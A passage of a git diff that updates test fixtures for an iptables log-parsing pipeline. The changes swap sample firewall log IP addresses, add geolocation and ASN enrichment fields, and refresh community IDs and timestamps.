"message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:a/4LVq88msR/LgVGzZeIkmlNXz4=", + "community_id": "1:4NmIL+7jDWJSegVPNW7Vf8u9up8=", "transport": "tcp" }, "observer": { @@ -936,14 +963,14 @@ }, "related": { "ip": [ - "198.51.100.19", + "192.168.100.19", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725493307Z", - "original": "Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195776600Z", + "original": "Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -980,15 +1007,15 @@ "source": { "port": 53296, "mac": "90:10:76:e0:e2:d5", - "ip": "198.51.100.68" + "ip": "192.168.100.68" }, - "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=198.51.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 ", + "message": "example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=192.168.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:1l65fWlqrJCJB7vBaqSgHnJoMbQ=", + "community_id": "1:JbpQRbHXlqHOyN6ZXFlgvG/jABc=", "transport": "tcp" }, "observer": { @@ -1000,14 +1027,14 @@ }, "related": { "ip": [ - "198.51.100.68", + "192.168.100.68", "172.16.54.114" ] }, "event": { "action": "drop_input", - "ingested": "2021-06-15T20:04:36.725495946Z", - "original": "Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=198.51.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 ", + "ingested": "2021-12-09T13:39:42.195781600Z", + "original": "Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=192.168.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 ", "type": [ "denied", "connection" @@ -1034,17 +1061,47 @@ "ttl": 64 }, "destination": { - "ip": "2001:0db8:0000:0000:0000:0000:0000:0002" + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { - "ip": "2001:0db8:0000:0000:0000:0000:0000:0001" + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, - "message": "ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2001:0db8:0000:0000:0000:0000:0000:0001 DST=2001:0db8:0000:0000:0000:0000:0000:0002 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 ", + "message": "ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 DST=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 ", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:u2vMS3HiWth2lIMKHB1fjELshpQ=", + "community_id": "1:l70dMD5f7kI8bfdEgFoDbb7DocE=", "transport": "ipv6-icmp" }, "observer": { @@ -1056,13 +1113,12 @@ }, "related": { "ip": [ - "2001:0db8:0000:0000:0000:0000:0000:0001", - "2001:0db8:0000:0000:0000:0000:0000:0002" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-06-15T20:04:36.725498569Z", - "original": "Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2001:0db8:0000:0000:0000:0000:0000:0001 DST=2001:0db8:0000:0000:0000:0000:0000:0002 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 ", + "ingested": "2021-12-09T13:39:42.195787800Z", + "original": "Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 DST=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 ", "category": [ "network" ], @@ -1117,7 +1173,7 @@ ] }, "event": { - "ingested": "2021-06-15T20:04:36.725501185Z", + "ingested": "2021-12-09T13:39:42.195793700Z", "original": "Jan 22 10:52:34 ubuntu-bionic kernel: [ 307.757925] IN= OUT=enp0s3 MAC=90:10:12:34:56:78:90:10:aa:bb:cc:dd:86:dd:ff:ff SRC=fe80:0000:0000:0000:0084:88ff:feae:790a DST=ff02:0000:0000:0000:0000:0000:0000:0016 LEN=96 TC=0 HOPLIMIT=1 FLOWLBL=0 PROTO=ICMPv6 TYPE=143 CODE=0 MARK=0xd4", "category": [ "network" @@ -1147,9 +1203,27 @@ "ttl": 64 }, "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, "port": 48689, "mac": "90:10:92:6e:ea:a7", - "ip": "255.55.174.225" + "ip": "81.2.69.143" }, "rule": { "name": "LAN_LOCAL", @@ -1160,13 +1234,13 @@ "mac": "90:10:73:ba:d6:77", "ip": "192.168.48.137" }, - "message": "MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 ", + "message": "MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:3qoibVBmc9hsnHpP4Ms5HO6ls7Q=", + "community_id": "1:X0/C+OHn+Y6LtFV5zGJkFDVT7/M=", "transport": "udp" }, "observer": { @@ -1179,13 +1253,13 @@ "related": { "ip": [ "192.168.48.137", - "255.55.174.225" + "81.2.69.143" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:36.725510393Z", - "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 ", + "ingested": "2021-12-09T13:39:42.195800900Z", + "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 ", "type": [ "allowed", "connection" @@ -1225,7 +1299,7 @@ "destination": { "port": 443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", @@ -1236,13 +1310,13 @@ "mac": "90:10:24:67:f4:89", "ip": "192.168.134.158" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 ", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:7bPQdYPL4yePwQJZt0I1dvVXLHc=", + "community_id": "1:BdmTg+UWl4/8/mdbYIG/bhkVfJQ=", "transport": "tcp" }, "observer": { @@ -1255,13 +1329,13 @@ "related": { "ip": [ "192.168.134.158", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:36.725513330Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 ", + "ingested": "2021-12-09T13:39:42.195805200Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 ", "type": [ "allowed", "connection" @@ -1302,7 +1376,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "source-dest", @@ -1313,13 +1387,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": "MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 ", + "message": "MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -1338,13 +1412,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "drop", - "ingested": "2021-06-15T20:04:36.725516021Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 ", + "ingested": "2021-12-09T13:39:42.195810200Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 ", "type": [ "denied", "connection" @@ -1383,7 +1457,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", @@ -1394,13 +1468,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 ", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -1413,13 +1487,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:36.725518668Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 ", + "ingested": "2021-12-09T13:39:42.195816500Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 ", "type": [ "allowed", "connection" @@ -1458,7 +1532,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", @@ -1469,13 +1543,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 ", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 ", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:6BwNFzns3BNljtYZJCwhPO5Qoq0=", + "community_id": "1:6eLXxu4ppPpoPmb/0UoBhdMHrBQ=", "transport": "tcp" }, "observer": { @@ -1488,13 +1562,13 @@ "related": { "ip": [ "192.168.110.116", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:36.725521297Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 ", + "ingested": "2021-12-09T13:39:42.195823800Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 ", "type": [ "allowed", "connection" diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log index b15c3a33a65..dafbe07d543 100644 --- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log +++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log @@ -1,8 +1,8 @@ -Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 +Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 +Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 +Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 +Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 +Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 May 5 20:46:45 My-Office-Gateway user.info kernel: TTL=126 ID=15317 DF PROTO=TCP SPT=59344 DPT=443 WINDOW=8212 RES=0x00 ACK PSH URGP=0 May 5 20:46:46 My-Office-Gateway user.info kernel: TTL=126 ID=51392 DF PROTO=TCP SPT=51653 DPT=7914 WINDOW=1024 RES=0x00 ACK PSH URGP=0 May 5 20:46:46 My-Office-Gateway user.info kernel: L=126 ID=8698 DF PROTO=TCP SPT=88 DPT=51179 WINDOW=2053 RES=0x00 ACK URGP=0 diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json index 3ea39ace522..6a87be00a00 100644 --- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json +++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json @@ -19,9 +19,27 @@ "ttl": 64 }, "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, "port": 48689, "mac": "90:10:92:6e:ea:a7", - "ip": "255.55.174.225" + "ip": "81.2.69.143" }, "rule": { "name": "LAN_LOCAL", @@ -32,13 +50,13 @@ "mac": "90:10:73:ba:d6:77", "ip": "192.168.48.137" }, - "message": "MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520", + "message": "MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:3qoibVBmc9hsnHpP4Ms5HO6ls7Q=", + "community_id": "1:X0/C+OHn+Y6LtFV5zGJkFDVT7/M=", "transport": "udp" }, "observer": { @@ -51,13 +69,13 @@ "related": { "ip": [ "192.168.48.137", - "255.55.174.225" + "81.2.69.143" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:38.320846840Z", - "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520", + "ingested": "2021-12-09T13:39:44.256951500Z", + "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520", "type": [ "allowed", "connection" @@ -97,7 +115,7 @@ "destination": { "port": 443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "WAN_OUT", @@ -108,13 +126,13 @@ "mac": "90:10:24:67:f4:89", "ip": "192.168.134.158" }, - "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0", + "message": "MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0", "tags": [ "preserve_original_event" ], "network": { "type": "ipv4", - "community_id": "1:7bPQdYPL4yePwQJZt0I1dvVXLHc=", + "community_id": "1:BdmTg+UWl4/8/mdbYIG/bhkVfJQ=", "transport": "tcp" }, "observer": { @@ -127,13 +145,13 @@ "related": { "ip": [ "192.168.134.158", - "192.0.2.25" + "192.168.2.25" ] }, "event": { "action": "accept", - "ingested": "2021-06-15T20:04:38.320852629Z", - "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0", + "ingested": "2021-12-09T13:39:44.256960300Z", + "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0", "type": [ "allowed", "connection" @@ -174,7 +192,7 @@ "destination": { "port": 1443, "mac": "90:10:20:76:8d:20", - "ip": "192.0.2.25" + "ip": "192.168.2.25" }, "rule": { "name": "source-dest", @@ -185,13 +203,13 @@ "mac": "90:10:65:29:b6:2a", "ip": "192.168.110.116" }, - "message": 